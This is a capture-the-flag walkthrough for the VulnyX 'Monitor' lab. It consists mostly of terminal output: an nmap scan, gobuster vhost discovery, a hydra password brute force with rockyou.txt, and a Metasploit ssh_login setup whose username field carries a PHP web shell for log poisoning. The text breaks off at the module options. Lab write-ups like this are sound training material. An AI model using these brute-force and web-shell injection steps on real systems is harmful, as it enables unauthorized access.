靶场练习-vulnyx：Monitor

┌──(root㉿kali)-[~]

└─# nmap -6 -p- -A fe80::20c:29ff:fe1a:234c%eth0 

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 06:51 EDT

Nmap scan report for fe80::20c:29ff:fe1a:234c

Host is up (0.00057s latency).

Not shown: 65533 closed tcp ports (reset)

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)

80/tcp open  http    Apache httpd 2.4.56 ((Debian))

┌──(root㉿kali)-[~]

└─# echo '192.168.1.177 monitoring.nyx' >> /etc/hosts

┌──(root㉿kali)-[~]

└─# gobuster vhost -u monitoring.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:             http://monitoring.nyx

[+] Method:          GET

[+] Threads:         10

[+] Wordlist:        /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

[+] User Agent:      gobuster/3.6

[+] Timeout:         10s

[+] Append Domain:   true

===============================================================

Starting gobuster in VHOST enumeration mode

===============================================================

Found: event.monitoring.nyx Status: 403 [Size: 285]

Progress: 114441 / 114442 (100.00%)

===============================================================

Finished

===============================================================

┌──(root㉿kali)-[~]

└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://event.monitoring.nyx/.admin -I -t 64

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-02 07:29:27

[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore

[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task

[DATA] attacking http-get://event.monitoring.nyx:80/.admin

[80][http-get] host: event.monitoring.nyx   login: admin   password: system

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-02 07:29:38

msf6 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting            Required  Description

   ----              ---------------            --------  -----------

   ANONYMOUS_LOGIN   false                      yes       Attempt to login with a blank username and

                                                          password

   BLANK_PASSWORDS   false                      no        Try blank passwords for all users

   BRUTEFORCE_SPEED  5                          yes       How fast to bruteforce, from 0 to 5

   CreateSession     true                       no        Create a new session for every successful l

                                                          ogin

   DB_ALL_CREDS      false                      no        Try each user/password couple stored in the

                                                           current database

   DB_ALL_PASS       false                      no        Add all passwords in the current database t

                                                          o the list

   DB_ALL_USERS      false                      no        Add all users in the current database to th

                                                          e list

   DB_SKIP_EXISTING  none                       no        Skip existing credentials stored in the cur

                                                          rent database (Accepted: none, user, user&r

                                                          ealm)

   PASSWORD          blog.gddfeng.com           no        A specific password to authenticate with

   PASS_FILE                                    no        File containing passwords, one per line

   RHOSTS            fe80::20c:29ff:fe1a:234c   yes       The target host(s), see https://docs.metasp

                                                          loit.com/docs/using-metasploit/basics/using

                                                          -metasploit.html

   RPORT             22                         yes       The target port

   STOP_ON_SUCCESS   false                      yes       Stop guessing when a credential works for a

                                                           host

   THREADS           1                          yes       The number of concurrent threads (max one p

                                                          er host)

   USERNAME          <?php system($_GET["cmd"]  no        A specific username to authenticate as

                     ); ?>

   USERPASS_FILE                                no        File containing users and passwords separat

                                                          ed by space, one pair per line

   USER_AS_PASS      false                      no        Try the username as the password for all us

                                                          ers

   USER_FILE                                    no        File containing usernames, one per line

   VERBOSE           false                      yes       Whether to print output for all attempts

View the full module info with the info, or info -d command.